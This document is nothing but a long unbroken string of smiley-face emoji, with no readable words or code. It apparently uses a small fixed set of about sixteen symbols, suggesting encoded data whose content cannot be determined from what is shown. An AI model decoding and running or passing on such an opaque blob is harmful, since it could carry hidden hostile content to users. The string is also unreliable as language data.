😜😉🤪🙂😁😄😁😊😇😁😁😝🤪😀🤪🙃😂😄🤣😊😅😉😅😇🙃😜😃😆😃😀😀😝🤣😉😃😁😁😊😇😆😊😝😉🙃😅😄🤪😊😃😂😉😝😉😇😀😅🙃😅🤪🤪😃😂😀😜😜😝😉😁😆🙂😀😇😆😇😇😅🤪😅😃😊😉😄🙃😂😄😉😉😜😉😂🤣😝😉🤣😀🤪😜😂🤪😆😜😉🙂🤪🤣😃🤣😅😉🙂🙂😇😉🤪🤪😁😂😝😊😉🙃😁😄😇😃😅😀🙂😇😅😅😅😉😀😁😂😇😆😜😁😀😇🙂😅😂🤪🤣😂😅😀😆😝😁😂🤣😜😃😉😅😝😅😅🤪🤪😝😂😇😜🤣😜🙂😊😀🤣😃😁🤣🤪😄🙃🙃😜😇🙂😁😃😄😉😃😂😅😃🙂🙂🤣😜😊😂😆🤪🤣🤣🤪🤪😁😉😊😆😇😇🤣😅😅🤪😆😊🤣🤣😀😇😊😆😝😝😃😆😇😂😉😄🙃😊🤪😄😜😇😁😄😊😊😆🤪😅😉😝😝🤣😂😁😄😀🙃😂😃😅🙃😆😄🤣😇🙂😆😇😝😊🤣😉🤣😅🤪😝😂🙂😀😉🙃😉😁🤣😇🤣😅🤣😝😄😂😆😀😄😊😆😊😁😁😇😇😊😅😉😅😃😇🤪😇🤪🤣😁😆🤪😄😁😀🙃😝😄🤣😃😜😀😂😜😀🤪🙃😝😂🙃😜😊😉😜😝😜🤣🙂😜😂🙂🤣😊😅😝😝😇😃🤣😝😜😜😇😜😂😄😁🤪🙂😝😃😇😉😊🤣🤣😝😜😅😄😇😄😁😃😉😃😃😉🙂🤪😜😉🤣😝🤪🤣😆😊😊😃😁😇😉🙃😃😅🙂🤪😀😄😂😀🤪🙂😅🙃😇😇😁🤪😉😁😀🙃🙂😇😜🤪😂😀🤪😆😅😉😇😁😁😂😉😇😄😃🙂🤪😜😊🤣😃🤪😀😅🤣😇😁😄🙃😉😊😃🙃😂😜😀😃🤣😜😝😅😅😂😇😅😄😊😉🤪😃😊🙂😃😀😁😂😃😝😂😅🙃😇😂😄😝😉😜😃😝🙂😁😀😄😂🙂😄🤪🙃🤣😃🙂😉😂😁🤣😃🤣🤣🙂😊🙂😜😆😁😅🙂😅😂😝😀😇😜😇🤣😄😝😃😀🤣😅😇😇😜🙃😝😄🤣😊😅😆😆😆🙃😊😇😀😊🙃😇🤣😝😜😀🙃😃😊😇😆😊😝😉🤣🙃😜🙂😀😂🤣🙃🤪😅😇😉😇🤣😅😄🤪😃😂😀😂😄😀😂🙂😊😂😁😆😅😇😉😅🙃🤪🙂😝🤣🤣😅😀🙂🙂🙃😃🤣😊😂😆😁😇😅😅😆🤪😜😀😅😉😉😄😊😊😉😆🙃😄🙃😇😊😆🙂😝😊😅😀🙃😂🤣🙂🙃😉😆🤪😜🙃😂😝😜😆😂😇😀😇😁😜😁🙃😇🙂😅😂🤪🤣😂😅🙂😆😝😂🤣😄😃🤣😆🤣😇😜😅🤪🤪😝🤣😃😜😃😇😃🤪😊😉😀🙂😝🤣😇😂😀😜😆🙂😁😃😄🤪😝🙃😜😄😄😉😜😆🙃😊😇🤣😂🤪😊🙃😄😀😝😉🙃😇🙃😂😀🤪😆😂😁😀😄😝😝😆😉😊😅😀😜😅🙃😊😜😇🤣😆🙂😇😆😃😝😂😜😝🤣😄😅🙂😆😝😇😁😀🙃😁🤪😝😜🙃🙃🤪😉😆😄😇😉😊😀😁😆🤪😉😉😀🤪😁😇😁😉😇😆😅😁🤪😄🤪😅🤣😃😜😃🙂😉😃😄😉😃😝😃😅😉🤪🙃😂🙂😇🤣😄😅😄😆😀😝🤣🤣😇😄😇😅😜😀😂😜😀🤪🙃😝😄😇😂😊🙃😉😃🙃😜🤪😀😀🙂🤣😃😅😉😆😂😅😁😃😊😅😅🙃😊😅🤣😝😜😜😂😜😃😀😀😃😝😅😅🙂🤪😂😂🤣😅😂😜😝🙂😉😃😉😊😅😃😁😇🤪😅😇😜😃😂🤪😀😉🙃🤣😃🤪😆🤪😝😂🤣🤣😜😅😅😅😇😂😁😇😊🤣😆😜😁😊😃😄😂😁😜😇🙂😊😃😉😃😆😄🙃🤣😃😀😝😂🤪🤪😉😇🙃🙃😄😄😃😊😀😁😜😇🤪🙃😝😆😃😊😊😝😀🙃🙃😄🙂😊😂😆🤣😝😅🤣😆😄😁😇😄😃😆😉🤣😄😜😊🤪😆😝😅😆😊😆😊😝😆😅😄😇😇😁😁🙃😇😊😅😆🤪😁😂😄🙂😂😁😆😃😝😆😂😇😝😉😂😅😝🤪😉😂🙃😀🙂🙃😂😄🤣😊😅🤣😆😃😁🤣😅😜😉🙂😀😀😜🙃🤪🙂😆😄😊😊😝😆😅😝😇🤣🙂🤪🙂😂🙃😀😉😁😂😇😂😅😄🤪😃😂😀🤣😃🤪🤣😅😜😜😀😝😃😝😀😅🙃🤪🙂😂😂😉😜🙃😂🙂😜😊🤪🤣😜😄😆🤣😄🤪😜😂🤪😀😝🙃😇😄😊😊😉🙂😃😃🙂😅😜😀🤣🙂😅😃😆😉😁🙂🙂😃🙃😊😃😁😄😊😇😆🤣😊😜😀🙃😝😇😃😀😇🤣😂😁😜🙃😂😄😜😇🙂🤪😄😅😇😀😆😀😇😜😅🤪😁😜😇😅😄😁🙃😝😊🙂😅🤣😝😇😁😉😊🤣😄😅🙂😁😜😁😅😆😝😀😁🙂😃😅🤪😁🤣😇😜😊🙂😉🤪🤪🤪🙃😄🙃🙂😁😝🙂😂🙃😁😉😀🙂🙃😃😄😀😉😜😇🤪😅😃😇😊😀😁😀😁😊🙂🙃😊😄😝😊🤣😆😅😝😆😇😅😜😂😆🤣😀😊🤪🙂😂😝😇😀😅😆😝😊🤣😉😜🙃😇😉🙂🤣😀😉😉🤪😀😊😇😇😅😆🤪😀😀😁🙃🙃😃🤪😉😝😁😇😃🤪🙂🙃😝😃😄😃😂🤣😊😜😇😉😆😉😉😀🤪😉😜😂😜😊😂😜😀🤪🙃😝🤣😝😃😜😊😂😆😄😝🤣😆🙃🤪😊🙂😄😃😁😉😂😄😂😃🙂🤪🤣🤣😜😜🤪🙂😝🤣😄😄😀😜😝😁🤪🤣😆😝🙂😉😉😀😊🙃😆😄😁😊😄😁😀😂😊😊😀🙃😂😂🙃😃🙃😀😀😁😀😊🙃😆🙂😝😂😇🙂😁😝😉😅😀😁🤣😉🤪🤣😊🙂😅🙃😝🤪🤣😝😜😇😜😆🙂😝😃😅🙃😊😁😁😇😅😅🙂🤪🙃😂😅😜😂😅😅😊😅😁😜😇🤪😅😝😄😝🤪😝🤣😜😜😉🙃😊😃😊😆🤣😝😅🤣😆😜😁🙂😄😃😃😝😝🤣😜😇😃😅😃😝😇🤣😊😜😉😇😇😂🙃😃😉🙃🤪😇🙂😅😉🤪😁😂😄😀😃😀😆😝😜😜🙂😇🤣😀🤣😊😀🙂😀😂😜😀🙂🙃😂😄🤣😊🙂😀😄😄🙃🙂😂😆😂😄😆😂😁🙃🤪😄😝😊😇😆😊😝😉😄🙃😆😇😇😂😝😝😉😊😁😆😇😁😅😄😅😝🤪🤣🙂😃😜😆🙃😇😇😀🤣🤪😇😉😅🙃🤪🙂😂😂😀🤣😅😅😂🙃😜😁😉😂😝😉🤣😀🤪😜😂🤪🤣😆😜😝🙃😂😄😅😊😇😆🙂😇😇😅😊🤪🙃😝😊😉🙃😁😄😇😃😅😀😁🤣😇😝😄😝😀🙃😄😀😁🤪🙃🤪😇🤪😅😂🤪🤣😂😅😆🙃😉😁😇😇😀😇😆😀🤣🙂😄😅😜😊😂😇😀😊🙃😉😂🤣😝😆😄😇🤣😄😊🤣😉😊😃😆😂😉😇😁😃😄😅😆🙃🤪🤪🤪😄🙂😇😄🙃😝😃🙃😉🙂😁😂😃🙃🙂😄😝😆🤪😆🤣😝😝😁😁😀🙂🙂😝🙃😄😂😁😂😝😊😄😂😁🤣😉😇😄😇🙂🙃😝😜😄😇😅😊😜🙂🙂😃😃😀🙃😜😅😂😆😜😄😃🤣😁😂😁😃😁🙂😊😄😀😉🤣😁😅😇😆😉😅😆😃😊😅😆😅😂🤣😄😝😊😝😆😅😇🙃😊😜🤪😇😂🙂😀😂🙃🤣🙂🙃😄🙃😊😀😝😅🤣🙂😜😀😂😜😀🤪😀😁🙃🤪😄😉😊😂😄😊😉😜😁🙃😊🙃😃😅😉😆😁😁😇😄😅😃🤣😀😊😇😁🤪😅😁😃😇😉😊😁😉😇🙃😅🙂🤣😂😇😄😆😅😇🙂🤣😀😊😄😆😃😝😀🙂😜🤪😝😆🤪😉🤣😀😉🤣😅😇😅😄😃🙂🤣🤪😃😁🤣🙂🙂😜😝😅😄😊😊😃😆😂😂😝😅😁😁🙂😊🤪😂😆😂🙃🤪😜😀🤣😁😇😁😃🤪😂🤣😝😉😁😂🙃🙂😜😃😅😁😊😁😀🤣😅🙂😇😂😄😀😂😄🤪😀😁😉🙂😇😜😉😅😆😉🤣😃😆🤣🤪😇😀😄😜🙂🙂😝😉😆🙂😉😄😜😆🤣😄😊😇😀🤪😂😇😝🤣😄🙂🙃😂🤣😉😀😂🙃😀😃😜😉🤪😄😀🙃🤣😊😁😃😀🙃😆🙃🙃😅🤪😄😇😊😅😆😆😝😁😃😅😊🙂🤣😉🙃😆🙂😅😝😂😊😆😅😃😝😉🤣🙃😜🙂🙂🙂🙃😉😊😅😊😝🙂🙃😊🤣😂😂🙂😄😜😜🙂🤪😃😝😜🤪😂🤣😝😉😝😇🤣😆😝😁😆😀🙃😇🤪🙂😅😀🤣😀😀😂😀😜🙃🤪😃😉🤣🤪😇😆😃🙃😅😀😅😅😝🙂🤣😂😜🤣😝😂🤣😀😇😃😁🤪😅😇😜😝🙂😇😜🙂😅😝😇😝😆😅😊😃😁😃😇😜😅😂🤪🤣😂😅😅🤣😉😉😝😊😀😅😁😉😂😂😉🙂😜😀🙂😂😀😊🙃😉😄🙃😀😉😊😃😁😀😇😊😀😂😇😃🤣🤪🤪🤪🙂😊😀😇😉😄😆😄😂🙂😜😊🙂😉😃🙃🤪🙃🙃😊😄😉🙃😉😅😇🤪😂😂😆😜😄🤣😁😃😀😊😃😁😅😇😃😜🙂😂😉😀🙃🙃🙂😂🙂😇😝😄😀😅😜😉😁😜🤣😜😃🙂😁😂🤣😝😜😅😃🙂🙃🤪😄😁😃😀😆🙂🙂😃😂😉🤣🙂😃😄🙃😊😆😆🤣😝🤣😂😄😜😃🙂😝😀🤪😉🤪😄😜😄😃🤪😜😂🙂😀😂🙃🤣🤣🙂😜😉😊😅😁😁😇🤪😅😅🤪😆😃🤪🙃😝😄😇😊😊🙂😉😜😝😁😊😂😅🤣😅😇😂😄😊🤣😁😊😁🤪😂😄😆😃🤪🙂😉😝😝😄🙃😅😊😁😝😇😜😅🙂🤪😂😂🤣😀😂😆🤪😅😜😇😅🙂😃😆😉😇😆😜😆😂😝😀😇🙃😊😆😀😜😜😊😃😃😆😆😀😇😜🤪🙃😅😆😉😄😁😃😇😀😂😊😊😉😜😅😄😇😅😜🙃😆😝😃😀🤪😆😄😂😝😊😅🤪😄😀🤪😅😁🙃😄😇😊😜😇😁🙂😂😀😉😊🤪😂😃😇😅😅🙂😉😊😉🤪🤣😄😜🤣😂😉😅😝😜😃😂😆😆🙂😃😊😜😜😂😄😉😅😉🙂🤣😇😊😀😂😁😉🤣🤣😉🤪🤪😄😀🤪😅🤣🙂😉😊🤣😜🤪😁😄😅🤪😉😂😝😉😀🤣😆🤪🙂😄😉🤪😜🤣😄😉😅🤣🙃🤪😝😄😜🤪😆😁😂😜😀😁😁🙂😊😇😆😊😝😉😊😅🤣😁🤪🤪😂😂😊😜🙃😂😝😀🙂😁😄🙃😇🤣😆😄🙂🤣😄😊😉😇😁😊😇😉😇😀😆🙃🤪😆🤣😊😀🙂🙂🙃😄😃😊😅😁🤣🙂😜😅😂😜😄🙂😃😀😇😄😁😇😅😆🙃😝🙂🤣😂😁🙂😇😉😅😀😇😅😁😃🙃🤪😇😝🤣😆😜🤣🤣😜🤪😄😊😃😊😃😁🙃😇🙂😅😂😁😇😝😉🤣😂😀😂🙃😃😄😁😂😁🤣😅🤣😅🤪😝😂😇😀😊🤪😀😁🙂😂🙃😊😀🤪😅😁😀🤣🙂🤪🙂😄😀😉😃😁😀😊😜🙃😀😄😇😊😁😁😀😉😃😃😆🙂😉😃😃😁😝😝😉😂😝😜😉🤣🤣🤪😉🙂😅😊😆😁🤪😇😝😅😇😁😁🤪🙃😂😂😜😝😉😀😂😝😆🙃😝😆🤣😁😜😄🤪🙂😂😃😀😇🙃😁😇😀😅😀😝😊🤣😉😜🙃😝😀😂😇😀😂🙃🙃😅🙃😅😁🤪😄😂😃😀😀🙂😜😅🤪😜😝😂😇😇🤪🤣😀🤪🙃😂🙂😀😂🤪😁😁🤪🤣😇😉😜🤪🤣😄😂🤪🙂🙂😅😀🤪🙃😝😄😇😊😄😜😂😊🤪😉😊🙃😇😉😀😆🙃😉😉😁😁😇😄😅😃😝😄😅😃🙃😀🙂🤣😉😄😝🙃😁😝😇😇😅🙂🤪😂😂🤣😅🙃😜😅🙂😅😂🙃😆😂😝😀😅😜🤪🤪😜😀🙂😀😀😝🙃😁😄😂😉😜🤣😝🤣😇😜😅🙂😆😃😁🙂😅😂🙃😂😅🙂😆😂😆😆😀🤣😃😝😀😃😉😉🙃😁🙂😄🤪🙃😄🤪😉😁🤪🙃🙃😊🙂😀😅😅😝😜🙂😁😜😉😝😊😇😆😝😉😂😀😉😅🤣😊😊😀😀🤣😊😇😃😀😊😂😀😊🙃😃😝😂😆😝😄😃😊😂😇😝😉🤪😇😂🙃😝😝😁😁😆😝😝😉😄😜🙃😝🤪😂😁😉😅😊😜🙃😆😃😉🙂😜😂😅🤣😊😄😀🙃😃😝🙃😊🤪😂😄😁🙃😉😀😜🤣😀😇🙃😝😝😂😁😊😜😃😜😂😇🙃😅😃😆😂😂😝🤪😄😊😆😇🤪😉😆🤣🙃😉🤪🙂😜😄😂😀😜😜🙂🤪😅😜😇😂😀😄😆😃🙂😃😉😝😜🤣😄😜🤣🤪😅😜🤪😂😝😀😁🤪🙃😂😇🤣😀😅😆😜🙃😜😁😝😊😉😆🙃😝🙂😊😆😁🙃😉😅😄😄🙂😝😜🙃😅😊😝🤣😁🙃😉🙃😄😆🙃😁😉🤪😁😝😝😇😆😅😊😅😄🤣🤣😝😀🙂🙃😁😄😄😊😃😊😆😁🙂😇😊😅😄😃😄😃😃🙃😉😄🙃😊🙂🤣😁🙂😆😅😅😇😄🙂😊😁😁😀🤣😁🤣😊😜😆🤪😝😝😆😃😂😝🙃😀😀🙂😆🙂🤪🤣😅😇😅😊🤪😆😂😁😀😄🤣🙃😜😄🙂🤣😆😀😀😁🙃😀🙂😀😂😉😀🙃🙃🙂😄😂😊🤣😆😅😃🙂😉😁🙂🙂🙂😂😃😀🙃😜😄🤪😃🙃😀😁🙃🙃😇🤣😂😄😂😂😂😇😉🤪😁😅😇😆😅😁😄😉🤪😅😂😆😜😜🤣🤪😃😇😉😜😁😜🙂🤪😜🙃😂🙂😀😂🙃🤣🤣😝😄🙃😊😀😁😁😇😜😅😜🤪🙂😂😄🤪😜🙃😊😄😉😊🤪😄🙃😇🙃🤣🙃😜😉😝😇😉😇😁😁😇😄😅😃😄😁😝😀🤣😉😜🙃😂🤪😀😇🙃😝😁😆😃😜🤪😇😂🤣😀😅🙃😆😂😆😜🙂😅😁😇😄🤪😜😜😀😂😝😀😇🙃😊😄😉😊🙃😇🙂😃😉😉🤣😜🙂🙂😊😃😁😉😄😁😃😀😅😊😅😆😆😝😄😅😜😜😜🙂😝😁😜😁😝😇😂😅🤣🤪😅😊😆😆😂😉😆😀😄🤣🤪😉😆😝😁😅😝🤪😇😂😊😅😄😉🤣🤪😁😃😆😅😆😁😉🤣🤣😜😁🙂😄😃😃😀😜😉😄😅😆🤣😅😝😇🤣😊😜😉😜🙃😂🙃😃😉😉😉😄😉😊🤣😆😇🤪😀😄😜😜😁🙂🤪😃😊🤣😇😁🤪😊😇🤣😃😉🙂😂😝🤪😄😅🙃🤪😇🙂😉😁😝😉😂😅🤣🙂😆😀😜🙃🤪😄😝😄😁😉😇😆😂😇🤪😜😊🙂😝😃🤣😉😅😁😆🤣😅🙃🤪😆🙃😂😅😜😝🤪😅🤪😆😊😄😁😊😇😉😅🙃😄😃😆😆😊🤣🙃😉😜🤪😅🙃😂🤣😀🤪🤣😀🤪😜😂🤪😁😝🙂😅😇😇😃😄😅🤪😉😅🤪😜😁😅🙂😆😇😇😀🙂😆😆😉😁🤪😄😁😅😂🙂😇😅😀😝😅😆🙃😉🤪😀😄😉🤣🙂😉😆😀😃😆😊🙃😀😝😄😄😃🤣😂😊😄😜😅😁😜🙂😂😇🙂😀😆😅😝😉😀😝😇😁😆😂🙂😊😆😀😇😅😀🙂😇🤪😆😄🙂🤣😆😊😝😀😀😁😇🙃😆😝🙂😃😆🤣😇😊😀🤪😇😆😆🙂🙂😇😆😃😝😃🙂🤪😇😁🤪😇😝😅😇😄😀😂😄😇🙂😄😊😂😊😝😅😄😊🙂😉😝😊😁😅🙂🤣😝😄😁😝🙃😀🤪😊😆🤣😉😁😜😊😅😄😉🙂😜😇😅🙃😉🤣😜😄😅😊😊😆😀😊🤣😉😊🙂😃😉🤣😝😇🙂😃😉😂🙂😇🤣😃😄😂😊😇🤪😃😉🙂😄😝🤣😄😄🙂😉😝🤪😄😉🙃😄🤪🤣😁😄🙃😊🤪🤪😁😉😉😄😜🤣😆😄😉😉😜🤪😆😉😊😄😀🤣😅😄😊😊🙃😆🙃😁😃😇😉😊😁😉🙃🙃😇😂😄😄😝🤪😜😊😇😆😃😊😊😝😆😃😝😀😅😜😄🤪😇🙃😄😜🙃😃😉🙃😆😀😇😀😄😃🙃😀😀😃🤣😁😀😊😉🙂😁😃😇😀😆😜😄😂😇😁🙃😁😂😂😃😉😂😝😁😊😇😝😅🤣🤪😅😂😆😃🤣😂😜😇🤣😃😄😇😆🤣😝😇😄😜😄😂😊😀😉🙃🙃😆😇😁😅🙃😅🤪😝😉🤣😀😀😂😉😃🤣😉😀😄😜😊🤪😊😝😁😜😇😇🤣🤣😜😅😝😜😉🤪😁🤣😇😅😅😆😅😂🤪🙃🤣🤣😜😅🙂😝😀😄😉😝😀😀🤣😂🤪😉😂🙃😀🙂🤪😉😂🤪😜😊😁🤣😝😂🙂😄😀😄😁🤣😝😉😂😂😀🙂🙂😃😃😄🤪😝🤣🙃😜🙂🙂😂🤣😁😊🙂😜😆😆😃😂😇😊🙂🤪😉😁😅🤣🙂😉🙂😜😁🤪🤣😂😀😅😊😊😉😄🙃🤣😄😉😄🤪😁😊🤣😆😉😝😃🤣😀🤪😜😇😆😁😀🤣🙂😊😀😉😃😀😆😂😄😊🙂😅😊🙂😊😃😆😉😁😁😄🙂🤣😇😇🤣🙃😉😅🤣😅🤣😊😃😁😊😀😁🙃😇🙂😅😂😂😅😉🙂🤣😜🤪😅😃😁😅😁😆😄😇😜😅🤪🤪😝😂😇😀😊😅😉😂😉😜🙂😉😇😝😇🤣😅😜😆🙂😁😝😁🤪🤪😜😃😅🤣😂😂😁😆🤣😆😀😝🙂😉😃🙃😉🙂🙂😄😀😅🙂😄🤪🙃😅😄😊😝😁😇😉😃😃🙃🙂🙂😉🙃🤣😁😂🤪😀😝😉😇😃😅🙂😅😜🤣😆🤣😁🙃🤣🙃😜😄🙂😃😃😀🙃🙂😄😆😀🙂😃😀😊😀🙃😃😅🤪🙂😇😃😂😉🤣😁😅😃😀😊🙂😆🙂🤪😅😜🙂😄😝😃🤪😉😝😁😇😜😇🤣🙂😇🙃😄😉🙃😄😀😀🤣😂😇🤣😄😝🙃😁😜😄😆😇😊😜😄😇🙃😆😜😄😅😝😇🙂😄🤪🙃😀😜😉🤣😀😇🤣😄😀😂😉😜😃😅😝😊😇😄😄🙂🤣😜😀😅🤣😇😄😄😂🙂😇🤪🙂😆😄😊🙂😃😇🙂😆🤪😜😅🙃😊😇😃😜🙂🙂🤪😉😅😅😊😝😄😁😂😇😝🤣😅😃😊😀😃😇🙂😂🤪😇😅😁😊😁😃😊🙂😅🤪🙃😂😝😉😊😃😆🙂😁😝😇😁🤣😉🙃😃😄😂🤣🤪😂😆😝😊😄😃😄😂🙂😝😇😆🙃😉😇😃😀😂😀😇😉😆😃😉😆😀😝😂🙂🤪😀😆😆😉😅😀😇😂🙂😝😊😂😃🙃😜😀🙂😂🤣😝😀😄😉😉😃😀😄😅😇😝🙂😁🤣😉😀😀😆😂😀😝🙃😁🤣😉😆😀😅🤣😉😀😁😁😃🙃😉😀🙃🤣😄😊😇😁😄🙃🤣😀😂🤣😝😝😄😁😄🙃🙂😜😇🤣🙃😇😇😁😀🙃😀🤪😉😅😝😇😂😄😉🙃😆😜🙂🤣😃😇🙃😄🤪🙃😂😜😜😅😜😜😂😄😅🙂🤪😜😇😅🤣😊😀😄🤣🙂😉😜😄😅😝😇😂😄😉🙂😝😜🤣😅🙂😇😁😄😊🙃😃😆😃😉😄😄😊😊😉😆🙃😆😜😇😊😆🤪😆😅😇🙃🙂🤪😁😅😝😆😅😀😝😜🤣🤪😅😀😉😆🤪😃😝😇😅😀😉😃🤪🙃😄😇🤣🙂😉😃🙃😇😄😊🤣😄😅😇😊😝😄🙂😂😀😊😃🤪🙃😁😀😄😜😊🙂😆😂😝🤣😅😜😊😄😂🤣🙃😜😜😁😂😂😊😂😅😝😝😝🤣😇😜😊🤪🤪🙂😇😀🤪😅😂😄😜😇🙂😀😆😝😊🤣😁😀😁🙂😝😃😊😉😁😆😀😇😜🤪🤪😊😉😀🙃🙃🙂😄😂🤪😄😁😆😂😊😇🙃😃😆😅😅😉🤣😜😄😁🤣🙂😃😝😄😀😜😆😝😉😆😜😄😁🤪🙂😉😇😝😃😊🤣😅😊😁😜😂😆😅🙂😜😝😃😀😜🤣😉😊😆😀🤣😆😇🙃😅😝🙃😄😉😂😄😊😜😀😆😆🙃🙂😂🤪😃😄😂🤣😅😊😜😀😅😆😁🙃😉🤪🙂😄😝🤣😊😇😅😀😊😆🙃😉😆🤪🙃😄😂🙂😃😇😂😀😅🤣😀😉😅🤪😁😁😝🙂😁😇😃😃😊😀😇😀😊🙃😆😄😁😊😄😇😆🙂🤪😜🙂😂🙂🙂🤣😉🙃😀😀😁🙂😊🙃😆🙂😝😂😇🤪🤣😆😜😁😂🤪😀😜🙃🤣😁😆😊😀😆😊😝😄😂😀😜😁🙂🙃😀😝😇🤪😇😝😅🤣🤪😅😂😆🙃🙃🤪🙃😝😜😉😁😉🤣😉🤣😄😆😜😄😂😊😀😉🙃🙃😃🤪😊😜😄😁😝😃😀😄😃😉😃🙂😃🤣😉😀😄😜😊🤪🙃😉😆😊😝🙃😅😜😀😄😆😇😉😝😁🤣😇😅😅😆😃😂🙃🤣😅😇🤣😄😇😄🙃🤪😉😄😝😆😅😊🤪😉😂🙃😅😊😇😂😄😊😂😝😝😅😆😀🙃😄😜😂😆😂😃🙂🙃🤪😄😝😊😇🙃😝😁😝😊😅😆🙃😂🤪😄😉😇🙃🤣😃😝😂😊😂😜😁😂😀😜😜🙂🤪😂😀😝😄😄😉😂😆😝😀😄😀😂😆😇😂😇😆😆😃😊😅😜😉😆🙃😉😝😜😁😆😉🙃😉😜😀😄🤪😇😀😆🙃😝🙂🤣😂😊🤪😉😇😊😁😂🙃😂🤪😄🙂😊😅🤪😅🤣🤪😜😝🙂😇🤪🙃😆😊🤪😉😄😃😅😂😇😇😀😊😀😉🙃😁😄😄😊😃😊🙂😁😜😇😃😆🤪🤪🙂😂😂😁😀😄😜😊🙂😆😂😝🤣🤪😀😝🤣😜🙂🤪😊😃😊😊🙂😄😆🤣😂😝😝🤣😇😜😊😇😉😁😆🤣🙃🙃😉🙂😃🤪😆😁😇😂😃😉😇🤪😁😀😉😆😝😁😃🙂😜😜😄😄😃😅😝🙂😆😇😂😉😊😃😄🤣😇🙃😄😝🤣😀😝😁🤪😃😅🙃😜😄🤪😊😜🤣🤪😝😊🤣😉😜🙃🙃🙂😃😂😉🤣😁😅😝🤣🙃🙂🤪😄😂😃😀😀🤣🤣😃😜😉😝😁😇😇😊😅😉🤪🙃😂🙂😀😂🙃🤣😄😅😊😆😆😁😝😄🤣😃😜😀🙂😀😀🤪🙃😝😄😇😊😊😆😉🤪😊🤣🙂😜😂🙂😂😃😅😊😝😁😆😇😄😅😃😜😄🤣😜😜🤪🙂🤪😃😇🤪😅😁😊😇🙃😅🙂😀😝😂🤣😀😅🙃😅😄😁😊😊😆😃😝😃😅😜😉😄😂🤪😃😀😉😝😄😉😊🙃😆🙂🤪😀🤣🤣😜🤣🙂😆😃😂😊😆😁😃😇😀😆😜🤪🙂🤣😝😜😝🙂😊😃😉😆😃😁🙂😇😂😅🤣🤪🤣😂😆😀😁🙃😄😄😁😝😄😁😜😇😜😅😝🤪😝😂😊😀😉🙃🙃😁😉😆😄😆🤣😝🤣🤣😆🙂🙃🙂😁😃😃😉😀😄😜😄😁😆😝😝😝🤣😊😜😉🙂🙃😃🙂😉😂😆🙂😀😝😅😆🤪😅😂😄🙂🙂🙃😀😃😜😉🤪😁😜🤪🤪😅😊🤪😝😂🙃😀🤪🙃😂😄🤣😊😅😆😆😃🙃🤣😄😜😅🙂😀😃😀🙃🤪😄😝😊😇😆😊😝😉🤣🙃😜😝🙂😂😃🙃😉😅😁😆😇😁🤣😆🤪😃😂😀😀😅🙂🤪😇😜😉😝😁😊😇😉😅🙃🤪🙂😂😂😀😊🙃😅😄🤣😊😁😆😆😝😃🤣🤣🤪😜😂🤪😃😃🙃😇🙂😂😊😉😆😉😝🙂🤣😇😜🤣🙂🙃😄🤣😉😁😁😄😇😃😉😇😝😜🤣😜😜😝🙂😇🤣😊😉😉😁🤪😇🙂😅😉🤪🤣😂😅😀😆😉😅😝😆😊😃😆🤣😇😜😁😊🤪🤪😂😇😀😊😉😇😄🙃😊🙂😆🤪😝🤣😜😊😜😅🙂😁😃😄😊😁😁😀😊😜😅🤣😝😝🤣😁😜😇🙂😉😃🙃😊😉😁😂😇🤣😅🤪🤪😆😀😂😀😁🙃😃😄😀😇😃😁🤪😇😝🤣🤣🤪😊😀😂😀😉🙃🙂😄😂😊🤣😆😅😝😆🤣😉😜😄🙂😊😃😀😉😃😄🤪😊😝😆😇😝😊😂😀😜🙃🙂🤪😃😂😉😝😁😅😇😆😅😁🤪😄😂🤣😀😀🙃😃😃🤪😉😜😁😇😝😃😅😉🤪🙃😂😇😀😂😜😄😄😅😊😅😆😁😝😂🤣😃😜😆🙃😃😀🤪🙃😝😄😇😃😂😆😉😝😉🤣🙂😜😂😝🤣😃😅😉🙃😁😁😇😅😅😃🤪😀🤣😜😃😀😁😜😃😇😊😃😁😉😉🤣😅🙃🤪😂😂🤣😃😂🙃😆😄😁😊🙃😆😃🤣🤣🤣😀🤪🤪😂😝😃🤪🙃😊😄😉😇😃😆🙂😇😆🤣🤣😜😅🙂😆😄😅😉😄😁😃😇🙃😆😜😅😁🤣😝😜😇🙂😊😄😇😉🙃😁🙂😝😃😅🤣🤣😀😂😅😀😁🙃😄😄😃😊😀😁😜😝😅😅😝😜🤣😂😊😀😇🙃🙃😄🙂😊😂😆🤣😝😊🤣😆😜🙃🙂😄😃🙂😉😀😄😜😊🤪😆😝🤪😃🤣😊😜😇🙂🙃😃😉😉😂😁😇😇😅😅😆🤪😂😂😄😅😝🙃😀😄😀😉🤪😆😄😇😇😅😜😜😇😂🙃😀🙂🙃😂🙂😄😊😅😆😅😝😁🤣😄😆😃🙂😀😃😆🙃🤪😁😀😊😇😆😊😝😉🤣😊😃😉🙂😂😃😇😉😅😆😄😇😁😅😄🤪😃😂😀😊😁🙂🤪😄😄😉😇😁😝😇😉😅😊🤪🙂😂😝😁😁🙃😅😄🙃😊😁😂😁😝😃🤣😃🤪😜😂😜😀😝😉😀😁😝😊😉😆🙃😝🙂🙃🙂😜🤣🙂🤣😃😆😉😂😆😆😇😃😅😀😝😜😇🙃😜😝🙂😝😃😊😉😉🙂🙃😇🙂😅😇🤪🤣😂🙂😀😆🙃😁😄😄😇😁😅😝😇😜🤣😆🤪😝😉🤣😀😝🙃😉😄🙃😇😉😆😂😝🤣🤣😇😜😆🙂😊😃😆😉😃😁😀😝😃😆🤪😝😝😂😆😜😊😉😊😃🙃😉🙂😁😂😇🤣😅😅🤪😆😂😉😀😄🙃🙂😄😀😊😂😁🤪😝😁😅😇🤪😊🙂😃😀🙃😝😅😄😂😊😂😆😅😝😅🤣😁😜🤣🙃😁😃😀🙃😜😄🤪😜😉😆😇😝😇🤣😉😀😊😅🙂😃😂😉😝😁😅😅😉😅😆🤪😄😂😃😃😄😝😂😃🤪😊😅😁😇😝🙂😅😊🤪🙃😂🙂😃🙃😝🤪😄😅😊😝😆😁😅😝🤣😃😜😀😂😜😄😀🤪😅😄😇😇😅😆😉😊😝🤣🙃😜😂🙂🤣😃😅😂😃😁😁😇🙃😅😃🤪😉🤣😜😀😀🙂😝😃😇😃😉😁😉😇😜😅🙂🤪😝😂🤣😀😇🙃😆😄🙃😝😜😆😃😝🤣😅😜😄😜😂😝😀😝🙃😊😄😊😊🙃😆😇🤪🙃🤣🤣😜😅🙂😆😅😆😉😄😁😄😇😀🤣😃😉🤪🤣😝😀😄🙂😊🙂😀😉😉😁🙂😇😂😅🤣🙃🙃😂😆😀🙂🙃😄😄😁😊😀😆😃😇🤪🤣😁😀😄😂😊😀🤪🙃🙃🙂😆😊😂😆😂😝😅🤣🙃😜😁🙂🤣😄😁😉😀😄😜😊🤪😉🙃😝😇🤣😇😜😉🙂🙃🤣🙂😉😂😁😊😇😅😅😂🤪😁😂😄😀😃😉😄😝